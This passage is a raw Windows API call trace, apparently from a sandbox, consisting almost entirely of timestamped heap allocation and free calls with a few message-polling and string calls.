0x29edd68 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e3b0 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edbe8 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722e8 [0083.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edbe8 | out: hHeap=0x2af0000) returned 1 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e0e0 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede28 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edca8 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0083.934] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddf8 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72308 [0083.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddf8 | out: hHeap=0x2af0000) returned 1 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e568 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede58 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddf8 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72568 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e298 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72518 [0083.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e1a8 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0083.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edbe8 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e568 | out: hHeap=0x2af0000) returned 1 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72308 | out: hHeap=0x2af0000) returned 1 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0083.935] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e450 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede58 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72308 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc00 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72598 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72598 | out: hHeap=0x2af0000) returned 1 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc18 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee020 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72438 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0e0 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72438 | out: hHeap=0x2af0000) returned 1 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0e0 | out: hHeap=0x2af0000) returned 1 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee020 | out: hHeap=0x2af0000) returned 1 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724e8 [0083.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724e8 | out: hHeap=0x2af0000) returned 1 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0083.935] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724a8 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc18 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edf48 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0c8 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edff0 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72598 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee188 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee1a0 [0083.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee008 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee020 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72468 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72468 | out: hHeap=0x2af0000) returned 1 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee050 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723a8 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723a8 | out: hHeap=0x2af0000) returned 1 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee080 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72408 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0e0 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee008 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee1a0 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee020 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee050 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee188 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72598 | out: hHeap=0x2af0000) returned 1 [0083.936] lstrlenW (lpString="20") returned 2 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee080 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72408 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0e0 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edff0 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0c8 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edff0 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee008 [0083.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72488 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edf48 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724a8 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee008 | out: hHeap=0x2af0000) returned 1 [0083.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72488 | out: hHeap=0x2af0000) returned 1 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edff0 | out: hHeap=0x2af0000) returned 1 [0083.937] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.937] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72408 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0c8 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edff0 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72488 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edf48 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee050 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72448 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee008 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee020 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724a8 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0e0 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724a8 | out: hHeap=0x2af0000) returned 1 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee080 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724e8 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724e8 | out: hHeap=0x2af0000) returned 1 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee188 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72538 [0083.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee1a0 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0e0 | out: hHeap=0x2af0000) returned 1 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee020 | out: hHeap=0x2af0000) returned 1 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee080 | out: hHeap=0x2af0000) returned 1 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee188 | out: hHeap=0x2af0000) returned 1 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee008 | out: hHeap=0x2af0000) returned 1 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72448 | out: hHeap=0x2af0000) returned 1 [0083.937] lstrlenW (lpString="30") returned 2 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72538 | out: hHeap=0x2af0000) returned 1 [0083.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee1a0 | out: hHeap=0x2af0000) returned 1 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee050 | out: hHeap=0x2af0000) returned 1 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edf48 | out: hHeap=0x2af0000) returned 1 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72488 | out: hHeap=0x2af0000) returned 1 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edf48 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee050 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72588 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edff0 | out: hHeap=0x2af0000) returned 1 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0c8 | out: hHeap=0x2af0000) returned 1 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72408 | out: hHeap=0x2af0000) returned 1 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee050 | out: hHeap=0x2af0000) returned 1 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edf48 | out: hHeap=0x2af0000) returned 1 [0083.938] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.938] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72588 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edf48 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724e8 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edff0 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee008 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72478 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0e0 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee188 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723c8 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee050 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723c8 | out: hHeap=0x2af0000) returned 1 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee020 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a723f8 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a723f8 | out: hHeap=0x2af0000) returned 1 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee1a0 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72598 [0083.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72598 | out: hHeap=0x2af0000) returned 1 [0083.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee080 [0083.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72488 [0083.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0c8 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee050 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee188 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee020 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee1a0 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0e0 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72478 | out: hHeap=0x2af0000) returned 1 [0083.939] lstrlenW (lpString="20") returned 2 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee080 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72488 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee0c8 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee008 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edff0 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724e8 | out: hHeap=0x2af0000) returned 1 [0083.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edff0 [0083.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee008 [0083.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72448 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edf48 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72588 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee008 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72448 | out: hHeap=0x2af0000) returned 1 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edff0 | out: hHeap=0x2af0000) returned 1 [0083.939] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0083.939] PeekMessageW (in: lpMsg=0x8cf228, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf228) returned 0 [0083.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72408 [0083.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edf48 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72408 | out: hHeap=0x2af0000) returned 1 [0083.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee020 [0083.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edf48 | out: hHeap=0x2af0000) returned 1 [0083.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee050 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee020 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edca8 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede28 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e0e0 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722e8 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e3b0 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc00 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72308 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e450 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edbe8 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e1a8 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72518 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e298 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd68 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721c8 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb70 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edab0 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72108 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb40 | out: hHeap=0x2af0000) returned 1 [0083.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edab0 [0083.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee050 | out: hHeap=0x2af0000) returned 1 [0083.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee188 [0083.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edff0 [0083.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0083.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e360 [0083.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee050 [0083.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72108 [0083.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee050 | out: hHeap=0x2af0000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e1f8 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee1a0 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edf48 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721c8 [0083.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee188 | out: hHeap=0x2af0000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e568 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722e8 [0083.941] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e568 | out: hHeap=0x2af0000) returned 1 [0083.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722e8 | out: hHeap=0x2af0000) returned 1 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee008 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722e8 [0083.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 